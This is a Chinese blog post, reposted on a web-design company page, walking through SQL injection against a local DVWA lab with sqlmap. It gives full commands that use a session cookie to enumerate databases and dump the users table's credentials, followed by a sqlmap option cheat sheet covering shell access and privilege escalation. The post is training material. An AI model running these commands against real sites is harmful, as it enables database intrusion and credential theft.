記一次初級dvwa爆庫

一 前期準備

為冀州等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計制作服務(wù),及冀州網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務(wù)為成都網(wǎng)站設(shè)計、網(wǎng)站制作、冀州網(wǎng)站設(shè)計,以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務(wù)。我們深信只要達到每一位用戶的要求,就會得到認可,從而選擇與我們長期合作。這樣,我們也可以走得更遠!

1 sqlmap在windows環(huán)境下需要python2.7的支持,在python官網(wǎng)下載即可

https://www.python.org/

2 安裝python2.7,默認即可。安裝完成后需要配置下環(huán)境變量。右擊計算機->高級系統(tǒng)設(shè)置->環(huán)境變量,找到系統(tǒng)變量的Path選項,雙擊,在最后添加;C:\Python27“;”必須要有,如果有其他python,可以刪掉。這是我的安裝路徑。

記一次初級dvwa爆庫 

3 按windows+R,輸入cmd打開dos界面,輸入python進行測試python是否安裝成功。

記一次初級dvwa爆庫 

返回python版本號,安裝成功

4 下載sqlmap,可以到我的百度云下載:http://pan.baidu.com/s/1skPClzR密碼:ndpj。

解壓后,改名為sqlmap,放到磁盤中

記一次初級dvwa爆庫 

5 打開cmd,切換到sqlmap對應(yīng)磁盤

記一次初級dvwa爆庫 

6 至此,sqlmap安裝完畢

二 開始爆庫

1 將dvwa安全級別設(shè)置為low,采用的是cookie注入。點擊sql注入,使用burpsuite抓包拿cookie

記一次初級dvwa爆庫 

2 url和cookie都需要使用,打開剛才開的cmd,鍵入

Sqlmap.py -u“http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie“security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1” --risk 3 --level 5 ,中途出現(xiàn)選擇項直接回車

記一次初級dvwa爆庫 

3  明顯看到有MySQL數(shù)據(jù)庫,先將數(shù)據(jù)庫顯示出來sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" --dbs

 

記一次初級dvwa爆庫 

4 可以看到有幾個數(shù)據(jù)庫,然后選擇dvwa數(shù)據(jù)庫,列表名

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa --tables

記一次初級dvwa爆庫 

5 出現(xiàn)兩個表名,肯定有用的是users表名,然后暴列名

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users --columns

記一次初級dvwa爆庫 

6 看到了很多列名,最有用的當然是用戶和密碼了,導出用戶和密碼

sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=skpm1rrqt637a4m1kukjnjkkr1" -D dvwa -T users -C user,password,user_id --dump

記一次初級dvwa爆庫 

7 好了至此完畢,接下來是sqlmap的命令解釋大全

-u #注入點

-g 谷歌搜索

-f #指紋判別數(shù)據(jù)庫類型

-b #獲取數(shù)據(jù)庫版本信息

-p #指定可測試的參數(shù)(?page=1&id=2 -p“page,id”)

-D “”#指定數(shù)據(jù)庫名

-T “”#指定表名

-C “”#指定字段

-s “”#保存注入過程到一個文件,還可中斷,下次恢復在注入(保存:-s“xx.log”  恢復:-s“xx.log” –resume)

–columns #列出字段

–current-user #獲取當前用戶名稱

–current-db #獲取當前數(shù)據(jù)庫名稱

–users #列數(shù)據(jù)庫所有用戶

–passwords #數(shù)據(jù)庫用戶所有密碼

–privileges #查看用戶權(quán)限(–privileges -U root)

-U #指定數(shù)據(jù)庫用戶

–dbs #列出所有數(shù)據(jù)庫

–tables -D“”#列出指定數(shù)據(jù)庫中的表

–columns -T“user”-D“mysql”#列出mysql數(shù)據(jù)庫中的user表的所有字段

–dump-all #列出所有數(shù)據(jù)庫所有表

–exclude-sysdbs #只列出用戶自己新建的數(shù)據(jù)庫和表

–dump -T“”-D“”-C“”#列出指定數(shù)據(jù)庫的表的字段的數(shù)據(jù)(–dump -T users -D master -C surname)

–dump -T“”-D“” –start 2–top 4 #列出指定數(shù)據(jù)庫的表的2-4字段的數(shù)據(jù)

–dbms #指定數(shù)據(jù)庫(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

–os #指定系統(tǒng)(Linux,Windows)

--sql -shell 寫shell

--delay 延遲的時間

--safe-freq 次數(shù)

-v #詳細的等級(0-6)

0:只顯示Python的回溯,錯誤和關(guān)鍵消息。

1:顯示信息和警告消息。

2:顯示調(diào)試消息。

3:有效載荷注入。

4:顯示HTTP請求。

5:顯示HTTP響應(yīng)頭。

6:顯示HTTP響應(yīng)頁面的內(nèi)容

–privileges #查看權(quán)限

–is-dba #是否是數(shù)據(jù)庫管理員

–roles #枚舉數(shù)據(jù)庫用戶角色

–udf-inject #導入用戶自定義函數(shù)(獲取系統(tǒng)權(quán)限)

–union-check #是否支持union注入

–union-cols #union查詢表記錄

–union-test #union語句測試

–union-use #采用union注入

–union-tech orderby #union配合order by

 

 

新聞標題:記一次初級dvwa爆庫
URL網(wǎng)址:http://muchs.cn/article46/gdehhg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供全網(wǎng)營銷推廣、域名注冊企業(yè)建站、網(wǎng)站排名、網(wǎng)站營銷、建站公司

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都網(wǎng)站建設(shè)公司